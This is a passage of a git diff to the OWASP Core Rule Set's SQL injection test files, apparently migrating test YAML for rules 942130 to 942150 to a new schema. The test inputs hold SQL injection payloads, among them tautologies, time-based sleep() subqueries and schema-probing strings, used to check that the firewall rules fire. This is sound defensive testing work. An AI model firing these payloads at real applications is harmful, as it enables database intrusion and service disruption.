headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - uri: "/get?a=11!=11" - version: HTTP/1.1 - output: - no_log_contains: id "942130" - - test_title: 942130-6 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + uri: "/get?a=11!=11" + version: HTTP/1.1 + output: + log: + no_expect_ids: [942130] + - test_id: 6 desc: "SQL Injection Attack: SQL Tautology" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - uri: "/get?a=b,1=1" - version: HTTP/1.1 - output: - log_contains: id "942130" - - test_title: 942130-7 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + uri: "/get?a=b,1=1" + version: HTTP/1.1 + output: + log: + expect_ids: [942130] + - test_id: 7 desc: "SQL Injection Attack: SQL Tautology - like" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - uri: "/post" - data: "a=42%20like%2042" - version: HTTP/1.1 - output: - log_contains: id "942130" - - test_title: 942130-8 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + uri: "/post" + data: "a=42%20like%2042" + version: HTTP/1.1 + output: + log: + expect_ids: [942130] + - test_id: 8 desc: "SQL Injection Attack: SQL Tautology" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - uri: "/get?a=This%20is%20like%20no%20other" - version: HTTP/1.1 - output: - no_log_contains: id "942130" - - test_title: 942130-9 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + uri: "/get?a=This%20is%20like%20no%20other" + version: HTTP/1.1 + output: + log: + no_expect_ids: [942130] + - test_id: 9 desc: "SQL Injection Attack: SQL Tautology using MySQL NULL-safe operator <=>" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - uri: "/get?a=42<=>42" - version: HTTP/1.1 - output: - log_contains: id "942130" - - test_title: 942130-10 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + uri: "/get?a=42<=>42" + version: HTTP/1.1 + output: + log: + expect_ids: [942130] + - test_id: 10 desc: "SQL Injection Attack: SQL Tautology using glob" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - uri: "/get?user=admin%40juice-sh.op'%20and%20password%20glob%20password;" - version: HTTP/1.1 - output: - log_contains: id "942130" + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + uri: "/get?user=admin%40juice-sh.op'%20and%20password%20glob%20password;" + version: HTTP/1.1 + output: + log: + expect_ids: [942130] diff --git a/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942131.yaml b/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942131.yaml index 934a8ac..37712c3 100644 --- a/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942131.yaml +++ b/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942131.yaml @@ -2,113 +2,112 @@ meta: author: "Felipe Zipitria" description: SQL Tautology - enabled: true - name: 942131.yaml +rule_id: 942131 tests: - - test_title: 942131-1 + - test_id: 1 desc: "SQL Injection Attack: SQL Tautology" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - uri: "/get?a=11!=1" - version: HTTP/1.1 - output: - log_contains: id "942131" - - test_title: 942131-2 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + uri: "/get?a=11!=1" + version: HTTP/1.1 + output: + log: + expect_ids: [942131] + - test_id: 2 desc: "SQL Injection Attack: SQL Tautology" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - uri: "/get?a=1!=11" - version: HTTP/1.1 - output: - log_contains: id "942131" - - test_title: 942131-3 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + uri: "/get?a=1!=11" + version: HTTP/1.1 + output: + log: + expect_ids: [942131] + - test_id: 3 desc: "SQL Injection Attack: SQL Tautology" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - uri: "/get?a=11!=11" - version: HTTP/1.1 - output: - no_log_contains: id "942131" - - test_title: 942131-4 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + uri: "/get?a=11!=11" + version: HTTP/1.1 + output: + log: + no_expect_ids: [942131] + - test_id: 4 desc: "SQL Injection Attack: SQL Tautology" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - uri: "/get?a=1%20is%20not%202" - version: HTTP/1.1 - output: - log_contains: id "942131" - - test_title: 942131-5 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + uri: "/get?a=1%20is%20not%202" + version: HTTP/1.1 + output: + log: + expect_ids: [942131] + - test_id: 5 desc: "SQL Injection Attack: SQL Tautology negative" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - uri: "/get?a=1%20is%20not%201" - version: HTTP/1.1 - output: - no_log_contains: id "942131" - - test_title: 942131-6 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + uri: "/get?a=1%20is%20not%201" + version: HTTP/1.1 + output: + log: + no_expect_ids: [942131] + - test_id: 6 desc: "SQL Injection Attack: SQL Tautology" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - uri: "/post" - data: "a='1' not regexp '2'" - version: HTTP/1.1 - output: - log_contains: id "942131" - - test_title: 942131-7 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + uri: "/post" + data: "a='1' not regexp '2'" + version: HTTP/1.1 + output: + log: + expect_ids: [942131] + - test_id: 7 desc: "SQL Injection Attack: SQL Tautology" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - uri: "/post" - data: "a='1' not regexp '1'" - version: HTTP/1.1 - output: - no_log_contains: id "942131" + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + uri: "/post" + data: "a='1' not regexp '1'" + version: HTTP/1.1 + output: + log: + no_expect_ids: [942131] diff --git a/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942140.yaml b/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942140.yaml index e05f3f2..421fedd 100644 --- a/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942140.yaml +++ b/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942140.yaml @@ -1,295 +1,293 @@ --- meta: author: "Christian S.J. Peron, Christoph Hansen, azurit" - description: None - enabled: true - name: 942140.yaml +rule_id: 942140 tests: - - test_title: 942140-1 + - test_id: 1 desc: "SQL Injection Attack: Common DB Names Detected" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get?sql_table=pg_catalog" - version: HTTP/1.0 - output: - log_contains: id "942140" - - test_title: 942140-2 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?sql_table=pg_catalog" + version: HTTP/1.0 + output: + log: + expect_ids: [942140] + - test_id: 2 desc: "SQL Injection Attack: Common DB Names Detected" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "INFORMATION_SCHEMA" - version: HTTP/1.0 - output: - log_contains: id "942140" - - test_title: 942140-3 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "INFORMATION_SCHEMA" + version: HTTP/1.0 + output: + log: + expect_ids: [942140] + - test_id: 3 desc: "SQL Injection Attack: Common DB Names Detected" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "database(" - version: HTTP/1.0 - output: - log_contains: id "942140" - - test_title: 942140-4 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "database(" + version: HTTP/1.0 + output: + log: + expect_ids: [942140] + - test_id: 4 desc: "SQL Injection Attack: Common DB Names Detected" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "db_name(" - version: HTTP/1.0 - output: - log_contains: id "942140" - - test_title: 942140-5 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "db_name(" + version: HTTP/1.0 + output: + log: + expect_ids: [942140] + - test_id: 5 desc: "SQL Injection Attack: Common DB Names Detected" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "DaTaBasE(" - version: HTTP/1.0 - output: - log_contains: id "942140" - - test_title: 942140-6 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "DaTaBasE(" + version: HTTP/1.0 + output: + log: + expect_ids: [942140] + - test_id: 6 desc: "SQL Injection Attack: Common DB Names Detected" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "InFoRmaTioN_ScHemA" - version: HTTP/1.0 - output: - log_contains: id "942140" - - test_title: 942140-7 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "InFoRmaTioN_ScHemA" + version: HTTP/1.0 + output: + log: + expect_ids: [942140] + - test_id: 7 desc: "SQL Injection Attack: Common DB Names Detected" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "DB_NAME(" - version: HTTP/1.0 - output: - log_contains: id "942140" - - test_title: 942140-8 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "DB_NAME(" + version: HTTP/1.0 + output: + log: + expect_ids: [942140] + - test_id: 8 desc: "SQL Injection Attack: Common DB Names Detected" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "tempdb" - version: HTTP/1.0 - output: - log_contains: id "942140" - - test_title: 942140-9 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "tempdb" + version: HTTP/1.0 + output: + log: + expect_ids: [942140] + - test_id: 9 desc: "SQL Injection Attack: Common DB Names Detected" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "msdb" - version: HTTP/1.0 - output: - log_contains: id "942140" - - test_title: 942140-10 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "msdb" + version: HTTP/1.0 + output: + log: + expect_ids: [942140] + - test_id: 10 desc: "SQL Injection Attack: Common DB Names Detected" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "mysql.db" - version: HTTP/1.0 - output: - log_contains: id "942140" - - test_title: 942140-11 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "mysql.db" + version: HTTP/1.0 + output: + log: + expect_ids: [942140] + - test_id: 11 desc: "SQL Injection Attack: Common DB Names Detected" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "MSysAccessObjects" - version: HTTP/1.0 - output: - log_contains: id "942140" - - test_title: 942140-12 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "MSysAccessObjects" + version: HTTP/1.0 + output: + log: + expect_ids: [942140] + - test_id: 12 desc: "SQL Injection Attack: Common DB Names Detected" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "Northwind" - version: HTTP/1.0 - output: - log_contains: id "942140" - - test_title: 942140-13 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "Northwind" + version: HTTP/1.0 + output: + log: + expect_ids: [942140] + - test_id: 13 desc: "SQL Injection Attack: Common DB Names Detected" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "northwind" - version: HTTP/1.0 - output: - log_contains: id "942140" - - test_title: 942140-14 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "northwind" + version: HTTP/1.0 + output: + log: + expect_ids: [942140] + - test_id: 14 desc: "SQL Injection Attack: Common DB Names Detected" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "SCHEMA_NAME" - version: HTTP/1.0 - output: - log_contains: id "942140" - - test_title: 942140-15 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "SCHEMA_NAME" + version: HTTP/1.0 + output: + log: + expect_ids: [942140] + - test_id: 15 desc: "SQL Injection Attack: Common DB Names Detected" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "DATABASE(" - version: HTTP/1.0 - output: - log_contains: id "942140" - - test_title: 942140-16 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "DATABASE(" + version: HTTP/1.0 + output: + log: + expect_ids: [942140] + - test_id: 16 desc: "SQL Injection Attack: Common DB Names Detected" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "schema_name" - version: HTTP/1.0 - output: - log_contains: id "942140" - - test_title: 942140-17 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "schema_name" + version: HTTP/1.0 + output: + log: + expect_ids: [942140] + - test_id: 17 desc: "SQL Injection Attack: Common DB Names Detected" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "information_schema" - version: HTTP/1.0 - output: - log_contains: id "942140" + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "information_schema" + version: HTTP/1.0 + output: + log: + expect_ids: [942140] diff --git a/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942150.yaml b/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942150.yaml index c130606..9f33475 100644 --- a/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942150.yaml +++ b/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942150.yaml @@ -2,328 +2,327 @@ meta: author: "Christian Folini, azurit" description: Various SQL injection tests - enabled: true - name: 942150.yaml +rule_id: 942150 tests: - - test_title: 942150-1 + - test_id: 1 desc: "Simple SQL injection" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=SKLJDRTZWS89E450W49NQB0W45BN\"=sleep(12)=\"" - version: HTTP/1.0 - output: - log_contains: id "942150" - - test_title: 942150-2 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=SKLJDRTZWS89E450W49NQB0W45BN\"=sleep(12)=\"" + version: HTTP/1.0 + output: + log: + expect_ids: [942150] + - test_id: 2 desc: "Simple SQL injection" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=1' and sleep(9) #" - version: HTTP/1.0 - output: - log_contains: id "942150" - - test_title: 942150-3 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=1' and sleep(9) #" + version: HTTP/1.0 + output: + log: + expect_ids: [942150] + - test_id: 3 desc: "Simple SQL injection" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=1(select*from(select(sleep(5)))d)" - version: HTTP/1.0 - output: - log_contains: id "942150" - - test_title: 942150-4 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=1(select*from(select(sleep(5)))d)" + version: HTTP/1.0 + output: + log: + expect_ids: [942150] + - test_id: 4 desc: "Advanced SQL injection" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=unittests@coreruleset.org' (function(){if(typeof foo===\"undefined\"){var a=new Date();do{var b=new Date();}while(b-a<20000);foo=1;}}()) '" - version: HTTP/1.0 - output: - log_contains: id "942150" - - test_title: 942150-5 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=unittests@coreruleset.org' (function(){if(typeof foo===\"undefined\"){var a=new Date();do{var b=new Date();}while(b-a<20000);foo=1;}}()) '" + version: HTTP/1.0 + output: + log: + expect_ids: [942150] + - test_id: 5 stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=test')and (select*from(select(sleep(10)))d)--" - version: HTTP/1.0 - output: - log_contains: id "942150" - - test_title: 942150-6 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=test')and (select*from(select(sleep(10)))d)--" + version: HTTP/1.0 + output: + log: + expect_ids: [942150] + - test_id: 6 desc: "Simple SQL injection" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=config.ini' and sleep(91) #" - version: HTTP/1.0 - output: - log_contains: id "942150" - - test_title: 942150-7 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=config.ini' and sleep(91) #" + version: HTTP/1.0 + output: + log: + expect_ids: [942150] + - test_id: 7 desc: "Simple SQL injection" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=None')and (select*from(select(sleep(10)))a)--" - version: HTTP/1.0 - output: - log_contains: id "942150" - - test_title: 942150-8 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: 